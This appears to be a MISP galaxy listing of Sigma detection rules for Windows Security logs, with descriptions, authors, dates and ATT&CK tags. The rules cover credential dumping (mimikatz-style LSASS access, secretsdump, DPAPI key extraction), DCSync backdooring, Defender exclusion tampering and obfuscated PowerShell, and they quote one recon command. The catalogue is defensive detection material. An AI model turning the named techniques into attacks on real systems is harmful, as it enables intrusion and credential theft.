Internal MISP references

UUID d00a9a72-2c09-4459-ad03-5e0a23351e36 which can be used as unique global reference for Suspicious LDAP-Attributes Used in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow @xknow_infosec
creation_date 2019/03/24
falsepositive ['Companies, who may use these default LDAP-Attributes for personal information']
filename win_security_susp_ldap_dataexchange.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.t1001.003', 'attack.command_and_control']
Related clusters

To see the related clusters, click here.

LSASS Access From Non System Account

Detects potential mimikatz-like tools accessing LSASS from non system account

Internal MISP references

UUID 962fe167-e48d-4fd6-9974-11e5b9a5d6d1 which can be used as unique global reference for LSASS Access From Non System Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/06/20
falsepositive ['Unknown']
filename win_security_lsass_access_non_system_account.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Possible Impacket SecretDump Remote Activity

Detect AD credential dumping using impacket secretdump HKTL

Internal MISP references

UUID 252902e3-5830-4cf6-bf21-c22083dfd5cf which can be used as unique global reference for Possible Impacket SecretDump Remote Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, wagga
creation_date 2019/04/03
falsepositive ['Unknown']
filename win_security_impacket_secretdump.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

ADCS Certificate Template Configuration Vulnerability with Risky EKU

Detects certificate creation with template allowing risk permission subject and risky EKU

Internal MISP references

UUID bfbd3291-de87-4b7c-88a2-d6a5deb28668 which can be used as unique global reference for ADCS Certificate Template Configuration Vulnerability with Risky EKU in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Orlinum , BlueDefenZer
creation_date 2021/11/17
falsepositive ['Administrator activity', 'Proxy SSL certificate with subject modification', 'Smart card enrollement']
filename win_security_adcs_certificate_template_configuration_vulnerability_eku.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.credential_access']

Possible DC Shadow Attack

Detects DCShadow via create new SPN

Internal MISP references

UUID 32e19d25-4aed-4860-a55a-be99cb0bf7ed which can be used as unique global reference for Possible DC Shadow Attack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah
creation_date 2019/10/25
falsepositive ['Valid on domain controllers; exclude known DCs']
filename win_security_possible_dc_shadow.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1207']
Related clusters

To see the related clusters, click here.

Windows Defender Exclusion Deleted

Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions

Internal MISP references

UUID a33f8808-2812-4373-ae95-8cfb82134978 which can be used as unique global reference for Windows Defender Exclusion Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @BarryShooshooga
creation_date 2019/10/26
falsepositive ['Unknown']
filename win_security_windows_defender_exclusions_write_deleted.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

DPAPI Domain Backup Key Extraction

Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers

Internal MISP references

UUID 4ac1f50b-3bd0-4968-902d-868b4647937e which can be used as unique global reference for DPAPI Domain Backup Key Extraction in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/06/20
falsepositive ['Unknown']
filename win_security_dpapi_domain_backupkey_extraction.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.004']
Related clusters

To see the related clusters, click here.

T1047 Wmiprvse Wbemcomn DLL Hijack

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network for a WMI DLL Hijack scenario.

Internal MISP references

UUID f6c68d5f-e101-4b86-8c84-7d96851fd65c which can be used as unique global reference for T1047 Wmiprvse Wbemcomn DLL Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)
creation_date 2020/10/12
falsepositive ['Unknown']
filename win_security_wmiprvse_wbemcomn_dll_hijack.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Unauthorized System Time Modification

Detect scenarios where a potentially unauthorized application or user is modifying the system time.

Internal MISP references

UUID faa031b5-21ed-4e02-8881-2591f98d82ed which can be used as unique global reference for Unauthorized System Time Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron
creation_date 2019/02/05
falsepositive ['HyperV or other virtualization technologies with binary not listed in filter portion of detection']
filename win_security_susp_time_modification.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.006']
Related clusters

To see the related clusters, click here.

NetNTLM Downgrade Attack

Detects NetNTLM downgrade attack

Internal MISP references

UUID d3abac66-f11c-4ed0-8acb-50cc29c97eed which can be used as unique global reference for NetNTLM Downgrade Attack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), wagga
creation_date 2018/03/20
falsepositive ['Unknown']
filename win_security_net_ntlm_downgrade.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001', 'attack.t1112']
Related clusters

To see the related clusters, click here.

VSSAudit Security Event Source Registration

Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.

Internal MISP references

UUID e9faba72-4974-4ab2-a4c5-46e25ad59e9b which can be used as unique global reference for VSSAudit Security Event Source Registration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)
creation_date 2020/10/20
falsepositive ['Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\Windows\System32\VSSVC.exe.']
filename win_security_vssaudit_secevent_source_registration.yml
level informational
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Password Change on Directory Service Restore Mode (DSRM) Account

The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.

Internal MISP references

UUID 53ad8e36-f573-46bf-97e4-15ba5bf4bb51 which can be used as unique global reference for Password Change on Directory Service Restore Mode (DSRM) Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/02/19
falsepositive ['Initial installation of a domain controller']
filename win_security_susp_dsrm_password_change.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Service Registry Key Read Access Request

Detects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.

Internal MISP references

UUID 11d00fff-5dc3-428c-8184-801f292faec0 which can be used as unique global reference for Service Registry Key Read Access Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Center for Threat Informed Defense (CTID) Summiting the Pyramid Team
creation_date 2023/09/28
falsepositive ['Likely from legitimate applications reading their key. Requires heavy tuning']
filename win_security_registry_permissions_weakness_check.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation STDIN+ Launcher - Security

Detects Obfuscated use of stdin to execute PowerShell

Internal MISP references

UUID 0c718a5e-4284-4fb9-b4d9-b9a50b3a1974 which can be used as unique global reference for Invoke-Obfuscation STDIN+ Launcher - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_stdin_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Powerview Add-DomainObjectAcl DCSync AD Extend Right

Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer

Internal MISP references

UUID 2c99737c-585d-4431-b61a-c911d86ff32f which can be used as unique global reference for Powerview Add-DomainObjectAcl DCSync AD Extend Right in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, Roberto Rodriguez @Cyb3rWard0g, oscd.community, Tim Shelton, Maxence Fossat
creation_date 2019/04/03
falsepositive ["New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account."]
filename win_security_account_backdoor_dcsync_rights.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Uncommon Outbound Kerberos Connection - Security

Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.

Internal MISP references

UUID eca91c7c-9214-47b9-b4c5-cb1d7e4f2350 which can be used as unique global reference for Uncommon Outbound Kerberos Connection - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community
creation_date 2019/10/24
falsepositive ['Web Browsers and third party application might generate similar activity. An initial baseline is required.']
filename win_security_susp_outbound_kerberos_connection.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

Suspicious Remote Logon with Explicit Credentials

Detects suspicious processes logging on with explicit credentials

Internal MISP references

UUID 941e5c45-cda7-4864-8cea-bbb7458d194a which can be used as unique global reference for Suspicious Remote Logon with Explicit Credentials in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton
creation_date 2020/10/05
falsepositive ['Administrators that use the RunAS command or scheduled tasks']
filename win_security_susp_logon_explicit_credentials.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.t1078', 'attack.lateral_movement']
Related clusters

To see the related clusters, click here.

Important Windows Event Auditing Disabled

Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled.

Internal MISP references

UUID ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1 which can be used as unique global reference for Important Windows Event Auditing Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/20
falsepositive ['Unlikely']
filename win_security_disable_event_auditing_critical.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation CLIP+ Launcher - Security

Detects Obfuscated use of Clip.exe to execute PowerShell

Internal MISP references

UUID 4edf51e1-cb83-4e1a-bc39-800e396068e3 which can be used as unique global reference for Invoke-Obfuscation CLIP+ Launcher - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_clip_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Reconnaissance Activity

Detects activity as "net user administrator /domain" and "net group domain admins /domain"

Internal MISP references

UUID 968eef52-9cff-4454-8992-1e74b9cbad6c which can be used as unique global reference for Reconnaissance Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community
creation_date 2017/03/07
falsepositive ['Administrator activity']
filename win_security_susp_net_recon_activity.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1087.002', 'attack.t1069.002', 'attack.s0039']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Clip - Security

Detects Obfuscated Powershell via use Clip.exe in Scripts

Internal MISP references

UUID 1a0a2ff1-611b-4dac-8216-8a7b47c618a6 which can be used as unique global reference for Invoke-Obfuscation Via Use Clip - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_use_clip_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Windows Pcap Drivers

Detects Windows Pcap driver installation based on a list of associated .sys files.

Internal MISP references

UUID 7b687634-ab20-11ea-bb37-0242ac130002 which can be used as unique global reference for Windows Pcap Drivers in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cian Heasley
creation_date 2020/06/10
falsepositive ['Unknown']
filename win_security_pcap_drivers.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.credential_access', 'attack.t1040']
Related clusters

To see the related clusters, click here.

Remote Task Creation via ATSVC Named Pipe

Detects remote task creation via at.exe or API interacting with ATSVC namedpipe

Internal MISP references

UUID f6de6525-4509-495a-8a82-1f8b0ed73a00 which can be used as unique global reference for Remote Task Creation via ATSVC Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ['Unknown']
filename win_security_atsvc_task.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.persistence', 'car.2013-05-004', 'car.2015-04-001', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Replay Attack Detected

Detects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client

Internal MISP references

UUID 5a44727c-3b85-4713-8c44-4401d5499629 which can be used as unique global reference for Replay Attack Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/14
falsepositive ['Unknown']
filename win_security_replay_attack_detected.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1558']
Related clusters

To see the related clusters, click here.

Sysmon Channel Reference Deletion

Potential threat actor tampering with Sysmon manifest and eventually disabling it

Internal MISP references

UUID 18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc which can be used as unique global reference for Sysmon Channel Reference Deletion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/07/14
falsepositive ['Unknown']
filename win_security_sysmon_channel_reference_deletion.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Credential Dumping Tools Service Execution - Security

Detects well-known credential dumping tools execution via service execution events

Internal MISP references

UUID f0d1feba-4344-4ca9-8121-a6c97bd6df52 which can be used as unique global reference for Credential Dumping Tools Service Execution - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
creation_date 2017/03/05
falsepositive ['Legitimate Administrator using credential dumping tool for password recovery']
filename win_security_mal_creddumper.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.execution', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.005', 'attack.t1003.006', 'attack.t1569.002', 'attack.s0005']
Related clusters

To see the related clusters, click here.

DPAPI Domain Master Key Backup Attempt

Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.

Internal MISP references

UUID 39a94fd1-8c9a-4ff6-bf22-c058762f8014 which can be used as unique global reference for DPAPI Domain Master Key Backup Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/10
falsepositive ['If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event.']
filename win_security_dpapi_domain_masterkey_backup_attempt.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.004']
Related clusters

To see the related clusters, click here.

SCM Database Handle Failure

Detects non-system users failing to get a handle of the SCM database.

Internal MISP references

UUID 13addce7-47b2-4ca0-a98f-1de964d1d669 which can be used as unique global reference for SCM Database Handle Failure in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/12
falsepositive ['Unknown']
filename win_security_scm_database_handle_failure.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1010']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security

Detects Obfuscated Powershell via VAR++ LAUNCHER

Internal MISP references

UUID 4c54ba8f-73d2-4d40-8890-d9cf1dca3d30 which can be used as unique global reference for Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_var_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

New or Renamed User Account with '$' Character

Detects the creation of a user with the "$" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.

Internal MISP references

UUID cfeed607-6aa4-4bbd-9627-b637deb723c8 which can be used as unique global reference for New or Renamed User Account with '$' Character in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename win_security_new_or_renamed_user_account_with_dollar_sign.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Windows Network Access Suspicious desktop.ini Action

Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.

Internal MISP references

UUID 35bc7e28-ee6b-492f-ab04-da58fcf6402e which can be used as unique global reference for Windows Network Access Suspicious desktop.ini Action in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton (HAWK.IO)
creation_date 2021/12/06
falsepositive ['Read only access list authority']
filename win_security_net_share_obj_susp_desktop_ini.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1547.009']
Related clusters

To see the related clusters, click here.

Tap Driver Installation - Security

Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.

Internal MISP references

UUID 9c8afa4d-0022-48f0-9456-3712466f9701 which can be used as unique global reference for Tap Driver Installation - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, Ian Davis, oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate OpenVPN TAP installation']
filename win_security_tap_driver_installation.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048']
Related clusters

To see the related clusters, click here.

PetitPotam Suspicious Kerberos TGT Request

Detect suspicious Kerberos TGT requests. Once an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.

Internal MISP references

UUID 6a53d871-682d-40b6-83e0-b7c1a6c4e3a5 which can be used as unique global reference for PetitPotam Suspicious Kerberos TGT Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mauricio Velazco, Michael Haag
creation_date 2021/09/02
falsepositive ['False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts.']
filename win_security_petitpotam_susp_tgt_request.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1187']
Related clusters

To see the related clusters, click here.

Potential Privileged System Service Operation - SeLoadDriverPrivilege

Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.

Internal MISP references

UUID f63508a0-c809-4435-b3be-ed819394d612 which can be used as unique global reference for Potential Privileged System Service Operation - SeLoadDriverPrivilege in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow (@xknow_infosec), xorxes (@xor_xes)
creation_date 2019/04/08
falsepositive ['Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers.']
filename win_security_user_driver_loaded.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR+ Launcher - Security

Detects Obfuscated use of Environment Variables to execute PowerShell

Internal MISP references

UUID dcf2db1f-f091-425b-a821-c05875b8925a which can be used as unique global reference for Invoke-Obfuscation VAR+ Launcher - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_var_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Windows Defender Exclusion Reigstry Key - Write Access Requested

Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.

Internal MISP references

UUID e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d which can be used as unique global reference for Windows Defender Exclusion Reigstry Key - Write Access Requested in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @BarryShooshooga, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/26
falsepositive ['Unknown']
filename win_security_windows_defender_exclusions_write_access.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Meterpreter or Cobalt Strike Getsystem Service Installation - Security

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation

Internal MISP references

UUID ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34 which can be used as unique global reference for Meterpreter or Cobalt Strike Getsystem Service Installation - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)
creation_date 2019/10/26
falsepositive ['Unlikely']
filename win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1134.001', 'attack.t1134.002']
Related clusters

To see the related clusters, click here.

Suspicious Kerberos RC4 Ticket Encryption

Detects service ticket requests using RC4 encryption type

Internal MISP references

UUID 496a0e47-0a33-4dca-b009-9e6ca3591f39 which can be used as unique global reference for Suspicious Kerberos RC4 Ticket Encryption in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/02/06
falsepositive ['Service accounts used on legacy systems (e.g. NetApp)', 'Windows Domains with DFL 2003 and legacy systems']
filename win_security_susp_rc4_kerberos.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

Windows Defender Exclusion List Modified

Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.

Internal MISP references

UUID 46a68649-f218-4f86-aea1-16a759d81820 which can be used as unique global reference for Windows Defender Exclusion List Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @BarryShooshooga
creation_date 2019/10/26
falsepositive ['Intended exclusions by administrators']
filename win_security_windows_defender_exclusions_registry_modified.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious Access to Sensitive File Extensions

Detects known sensitive file extensions accessed on a network share

Internal MISP references

UUID 91c945bc-2ad1-4799-a591-4d00198a1215 which can be used as unique global reference for Suspicious Access to Sensitive File Extensions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ['Help Desk operator doing backup or re-imaging end user machine or backup software', 'Users working with these data types or exchanging message files']
filename win_security_susp_raccess_sensitive_fext.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.collection', 'attack.t1039']
Related clusters

To see the related clusters, click here.

External Disk Drive Or USB Storage Device Was Recognized By The System

Detects external disk drives or plugged-in USB devices.

Internal MISP references

UUID f69a87ea-955e-4fb4-adb2-bb9fd6685632 which can be used as unique global reference for External Disk Drive Or USB Storage Device Was Recognized By The System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Keith Wright
creation_date 2019/11/20
falsepositive ['Likely']
filename win_security_external_device.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.t1091', 'attack.t1200', 'attack.lateral_movement', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Add or Remove Computer from DC

Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.

Internal MISP references

UUID 20d96d95-5a20-4cf1-a483-f3bda8a7c037 which can be used as unique global reference for Add or Remove Computer from DC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/14
falsepositive ['Unknown']
filename win_security_add_remove_computer.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1207']
Related clusters

To see the related clusters, click here.

SCM Database Privileged Operation

Detects non-system users performing privileged operation os the SCM database

Internal MISP references

UUID dae8171c-5ec6-4396-b210-8466585b53e9 which can be used as unique global reference for SCM Database Privileged Operation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
creation_date 2019/08/15
falsepositive ['Unknown']
filename win_security_scm_database_privileged_operation.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Suspicious Windows ANONYMOUS LOGON Local Account Created

Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.

Internal MISP references

UUID 1bbf25b9-8038-4154-a50b-118f2a32be27 which can be used as unique global reference for Suspicious Windows ANONYMOUS LOGON Local Account Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author James Pemberton / @4A616D6573
creation_date 2019/10/31
falsepositive ['Unknown']
filename win_security_susp_local_anon_logon_created.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001', 'attack.t1136.002']
Related clusters

To see the related clusters, click here.

HackTool - NoFilter Execution

Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators

Internal MISP references

UUID 7b14c76a-c602-4ae6-9717-eff868153fc0 which can be used as unique global reference for HackTool - NoFilter Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Stamatis Chatzimangou (st0pp3r)
creation_date 2024/01/05
falsepositive ['Unknown']
filename win_security_hktl_nofilter.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1134', 'attack.t1134.001']
Related clusters

To see the related clusters, click here.

Protected Storage Service Access

Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers

Internal MISP references

UUID 45545954-4016-43c6-855e-eae8f1c369dc which can be used as unique global reference for Protected Storage Service Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/10
falsepositive ['Unknown']
filename win_security_protected_storage_service_access.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

PowerShell Scripts Installed as Services - Security

Detects powershell script installed as a Service

Internal MISP references

UUID 2a926e6a-4b81-4011-8a96-e36cc8c04302 which can be used as unique global reference for PowerShell Scripts Installed as Services - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020/10/06
falsepositive ['Unknown']
filename win_security_powershell_script_installed_as_service.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

